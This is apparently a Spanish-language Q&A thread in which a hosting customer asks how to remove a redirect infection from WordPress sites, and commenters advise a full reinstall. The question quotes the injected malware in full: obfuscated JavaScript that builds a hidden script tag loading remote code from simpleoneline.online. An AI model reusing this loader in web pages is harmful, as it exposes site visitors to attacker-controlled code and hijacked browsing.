# Como Eliminar Malware de Redireccion de Sitio web

Tags: php, javascript, wordpress, redirección

se me ha presentado el siguiente problema:

En mí hosting alojo varios sitios webs en los cuales había algunos hechos en wordpress, lo que sucede es que al ingresar a un dominio una vez cargue la web se redirige sin consentimiento a otras webs con publicidad.

He revisado algunos foros y me ayudaron a detectar la instrucción maliciosa, pero borrarla no es la solución ya que sigue apareciendo.

Quisiera saber si a alguno de esta comunidad le ha pasado algo similar y ha logrado resolverlo para que me apoye con la solución de mi problema.

Les dejo la instrucción:

```html
var a1=function(){var _0x41tbc1=String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 109, 112, 108, 101, 111, 110, 101, 108, 105, 110, 101, 46, 111, 110, 108, 105, 110, 101, 47, 111, 110, 108, 105, 110, 101, 46, 106, 115, 63, 106, 115, 61, 118, 46, 49, 46, 48, 46, 49, 49);var _0x41tbc2=document["\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"]("\x73\x63\x72\x69\x70\x74");_0x41tbc2["\x74\x79\x70\x65"]= "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";_0x41tbc2["\x61\x73\x79\x6E\x63"]= true;_0x41tbc2["\x69\x64"]= "\x63\x64\x37\x30\x39\x30\x31\x30\x30\x31\x30";_0x41tbc2["\x73\x72\x63"]= _0x41tbc1;var _0x41tbc3=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74")[0];_0x41tbc3["\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"]["\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65"](_0x41tbc2,_0x41tbc3)};var scripts=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74");var n=true;for(var i=0;i< scripts["\x6C\x65\x6E\x67\x74\x68"];i++){if(scripts[i]["\x69\x64"]== "\x63\x64\x37\x30\x39\x30\x31\x30\x30\x31\x30"){n= false}};if(n== true){a1()}
```

Comment: Tu situación pinta muy pero que muy fea. El código que muestras es un indicativo casi seguro de que te han inyectado código en el sitio debido a algún agujero de seguridad. En WP es un peligro hasta no entrar como administrador durante 15 días o un mes, porque el sitio va quedando desactualizado. Te aconsejo que no pierdas tiempo tratando de averiguar cómo fue el hackeo ni por donde, WP tiene tal ramificación que es tarea casi imposible. Lo que sí es seguro que deberás instalar todo desde cero, previa revisión de todo. Sugiero que [leas aquí](https://es.stackoverflow.com/a/215708/29967).

Comment: El problema es que no solo se ramifico a los wordpress sino a los jquery, otros dominios con paginas estaticas, lo que he realizado es dar de baja los sitios hechos en wordpress.

Comment: Alex no es que se *haya ramificado a los jQuery*, ten en cuenta que jQuery corre del lado del cliente. O sea, si yo estoy en Mongolia y entro a tu sitio desde un PC que no tiene nada que ver con el ataque que has sufrido en tu sitio y que no tiene virus, voy a ver la basura que se está produciendo en tu sitio, incluyendo partes en jQuery, pero todo eso es inyectado **desde el servidor** que es donde está el problema realmente. Al lograr entrar en tu servidor e inyectar código, ese código tiene una potencia tremenda que puede modificar cualquier parte de tu web, redirigir ...

Comment: ... e incluso intentar atacar a dispositivos que entren en tu sitio. Si por ejemplo tu sitio está dado de alta en el buscador de Google u otros ya habrás recibido una advertencia al respecto de que tu sitio es peligroso. Google suele penalizar, bloquear, sacar de los resultados de búsqueda los sitios que son atacados hasta que no se corrige el problema. Ten cuidado con creer que puedes limpiarlo fácilmente borrando dos o tres archivos, en estos casos la solución más eficaz es instalar todo nuevo y luego subir el contenido uno por uno previa revisión (incluyendo lo que hay en la b. de datos).

Comment: no he borrado 2 o 3 archivos osea borre todo de los dominios y borre las bases de datos, ya no tengo sitios en wordpress, solo estaticos, y una tienda virtual que tambien fue afectada.